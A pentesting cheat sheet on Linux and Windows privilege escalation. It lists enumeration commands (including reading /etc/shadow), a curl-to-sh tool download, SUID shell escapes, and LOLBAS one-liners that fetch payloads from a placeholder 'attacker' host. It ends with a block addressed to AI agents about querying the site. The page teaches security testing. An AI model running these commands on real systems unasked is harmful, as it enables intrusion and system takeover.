# Privilege Escalation This page provides an overview of privilege escalation techniques. For detailed platform-specific guides, see: * [Linux Privilege Escalation](/post-exploitation/linux.md) * [Windows Privilege Escalation](/post-exploitation/windows.md) ## General Methodology ### 1. Situational Awareness ```bash # Who am I? whoami id hostname # What system is this? uname -a # Linux systeminfo # Windows cat /etc/*release # Linux distro # Network information ip a / ifconfig # Linux ipconfig /all # Windows netstat -antup # Linux netstat -ano # Windows ``` ### 2. Users & Groups ```bash # Linux cat /etc/passwd cat /etc/group cat /etc/shadow # If readable who w last # Windows net user net localgroup net localgroup Administrators whoami /priv whoami /groups ``` ### 3. Running Processes & Services ```bash # Linux ps aux ps -ef top cat /etc/services # Windows tasklist /v wmic process list full sc query net start ``` ### 4. Installed Software ```bash # Linux dpkg -l # Debian rpm -qa # RHEL pip list which python perl ruby gcc nc wget curl # Windows wmic product get name,version reg query HKLM\SOFTWARE dir "C:\Program Files" dir "C:\Program Files (x86)" ``` ### 5. Scheduled Tasks ```bash # Linux crontab -l ls -la /etc/cron* cat /etc/crontab systemctl list-timers # Windows schtasks /query /fo LIST /v dir C:\Windows\Tasks ``` ## Automated Enumeration Tools ### Linux ```bash # LinPEAS - Most comprehensive curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # LinEnum wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh chmod +x LinEnum.sh && ./LinEnum.sh -t # Linux Exploit Suggester wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh # pspy - Monitor processes wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 chmod +x pspy64 && ./pspy64 ``` ### Windows ```powershell # WinPEAS # https://github.com/carlospolop/PEASS-ng/releases .\winPEASany.exe # PowerUp # https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 Import-Module .\PowerUp.ps1 Invoke-AllChecks # Seatbelt # https://github.com/GhostPack/Seatbelt .\Seatbelt.exe -group=all # SharpUp # https://github.com/GhostPack/SharpUp .\SharpUp.exe ``` ## Common Privilege Escalation Vectors ### Linux | Vector | Description | Detection | | -------------------- | ----------------------------------------- | -------------------------------- | | SUID/SGID | Binaries running with elevated privileges | `find / -perm -4000 2>/dev/null` | | Sudo misconfig | Commands allowed without password | `sudo -l` | | Capabilities | Special kernel privileges | `getcap -r / 2>/dev/null` | | Writable files | Config files, scripts | `find / -writable 2>/dev/null` | | Cron jobs | Scheduled tasks with issues | `cat /etc/crontab` | | Kernel exploits | Unpatched kernel | `uname -a` | | NFS no\_root\_squash | Mountable shares | `cat /etc/exports` | | Docker group | Container escape | `id \| grep docker` | ### Windows | Vector | Description | Detection | | ------------------------- | --------------------------- | ------------------------------------ | | Unquoted service paths | Service path without quotes | `wmic service get name,pathname` | | Weak service permissions | Modifiable service binaries | `accesschk.exe /accepteula -uwcqv *` | | AlwaysInstallElevated | MSI runs as SYSTEM | Registry check | | Stored credentials | Cached passwords | `cmdkey /list` | | DLL hijacking | Missing DLLs in PATH | Process Monitor | | Token impersonation | Potato attacks | `whoami /priv` | | Unpatched vulnerabilities | Missing KB | `systeminfo` | ## Quick Reference ### GTFOBins (Linux) ```bash # https://gtfobins.github.io/ # SUID exploitation examples # Python python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # Find find . -exec /bin/sh -p \; -quit # Vim vim -c ':py import os; os.execl("/bin/sh", "sh", "-p")' # Bash /bin/bash -p ``` ### LOLBAS (Windows) ```powershell # https://lolbas-project.github.io/ # Living Off The Land Binaries # certutil - Download files certutil -urlcache -f http://attacker/file.exe file.exe # mshta - Execute HTA mshta http://attacker/evil.hta # rundll32 - Execute DLL rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();h=new%20ActiveXObject("WScript.Shell").Run("powershell -ep bypass -c IEX(cmd)") ``` ## Resources * [HackTricks - Linux Privilege Escalation](https://book.hacktricks.xyz/linux-hardening/privilege-escalation) * [HackTricks - Windows Privilege Escalation](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) * [PayloadsAllTheThings - Linux Privesc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) * [PayloadsAllTheThings - Windows Privesc](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) * [Absolomb's Security Blog - Windows Privilege Escalation Guide](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.pentest-book.com/exploitation/privilege-escalation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.